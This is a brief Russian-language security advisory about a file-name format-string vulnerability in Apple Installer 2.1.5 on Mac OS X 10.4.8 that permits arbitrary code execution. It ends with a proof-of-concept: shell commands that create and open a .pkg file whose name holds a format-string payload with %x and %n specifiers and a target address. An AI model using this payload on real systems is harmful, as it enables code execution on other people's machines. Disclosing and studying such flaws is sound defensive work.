Программа:
Apple Installer 2.1.5
Mac OS X 10.4.8
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при обработке имен файлов. Атакующий может выполнить произвольный код на целевой системе.
Пример:
$ touch AAAA`ruby -e 'require "cgi"; print CGI::escape("\x9c\xe7\xff\xbf") + CGI::escape("%.20d") + CGI::escape("%x" * 20)'`%n.pkg
$ open AAAA%9C%E7%FF%BF%25.20d%25x%25x%25x %25x%25x%25x%25x%25x%25x%25x%25x%25x%25 x%25x%25x%25x%25x%25x%25x%25x%n.pkg